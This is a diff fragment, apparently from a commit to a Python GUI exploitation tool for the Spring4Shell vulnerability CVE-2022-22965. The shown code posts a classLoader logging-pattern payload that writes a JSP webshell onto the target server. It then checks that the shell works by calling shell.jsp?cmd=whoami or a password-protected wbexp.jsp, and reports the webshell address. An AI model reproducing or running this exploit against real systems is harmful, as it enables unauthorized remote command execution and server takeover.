@@ -830,17 +830,25 @@ def CVE_2022_22965(self, url, proxies):
830
830
sleep (1 )
831
831
pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
832
832
ret = requests .post (url , headers = post_headers , data = pattern_data , verify = False )
833
- back = "[+]Wirte Shell Response Code: %d" % ret .status_code
833
+ back = "[+]Wirte Shell Response Code: %d 等待验证 " % ret .status_code
834
834
self .info_text .insert (tk .INSERT ,back )
835
835
self .info_text .insert (tk .INSERT , '\n ' )
836
- if Vule == "CVE-2022-22965" :
836
+ if filename == "shell" :
837
+ test = requests .get (url + filename + ".jsp?cmd=whoami" )
838
+ elif filename == "wbexp" :
839
+ test = requests .get (url + filename + ".jsp" )
840
+ if Vule == "CVE-2022-22965" and ('//' in str (test .text )):
837
841
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?cmd=whoami"
838
842
self .info_text .insert (tk .INSERT ,back )
839
843
self .info_text .insert (tk .INSERT , '\n ' )
840
- elif Vule == "22965-13exp-shell" :
844
+ elif Vule == "22965-13exp-shell" and ( '13exp' in str ( test . text )) :
841
845
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "wbexp.jsp?pwd=13exp&cmd=whoami"
842
846
self .info_text .insert (tk .INSERT ,back )
843
847
self .info_text .insert (tk .INSERT , '\n ' )
848
+ else :
849
+ back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
850
+ self .info_text .insert (tk .INSERT ,back )
851
+ self .info_text .insert (tk .INSERT , '\n ' )
844
852
else :
845
853
back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
846
854
self .info_text .insert (tk .INSERT ,back )
0 commit comments